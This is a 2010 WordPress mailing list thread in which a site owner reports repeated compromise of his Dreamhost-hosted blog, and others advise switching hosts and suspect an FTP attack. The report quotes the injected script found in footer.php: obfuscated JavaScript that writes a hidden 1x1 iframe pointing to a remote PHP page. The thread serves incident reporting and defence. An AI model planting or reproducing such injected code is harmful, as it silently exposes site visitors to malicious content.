[wp-hackers] wordpress theme script injection (hosted on dreamhost)
Baki Goxhaj
banago at gmail.com
Sun Oct 31 15:27:34 UTC 2010
I agree with Vid - try switching hosts first.
Kindly,
Baki Goxhaj
www.wplancer.com | www.banago.info | www.lintuts.com
On 31 October 2010 16:17, Vid Luther <vid at zippykid.com> wrote:
> Mladen,
> Instead of switching platforms completely, I would recommend first
> changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
> wpengine, my company, or even godaddy.. their UI sucks, but their phone
> support is fairly decent.
>
> As for the exploit, it may not be a wordpress exploit, but an ftp
> attack, as it's just looking for filesystem paths and injecting to it.
>
> I'm assuming by default theme footer, you meant twentyten theme, and
> footer.php ?
>
>
>
> Mladen Adamovic wrote:
> > Hi guys,
> >
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> >
> > I don't know which exploit it did use and couldn't identify it, but it
> was
> > adding the following code to my default theme footer.php:
> >
> > <script>
> > enc =
> >
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> >
> > I think I'll have to migrate to Blogger, since I couldn't identify
> exploit
> > it did use.
> >
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
>
> --
> Vid Luther
> Founder
> ZippyKid
> http://zippykid.com/
> 210-789-0369
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
More information about the wp-hackers
mailing list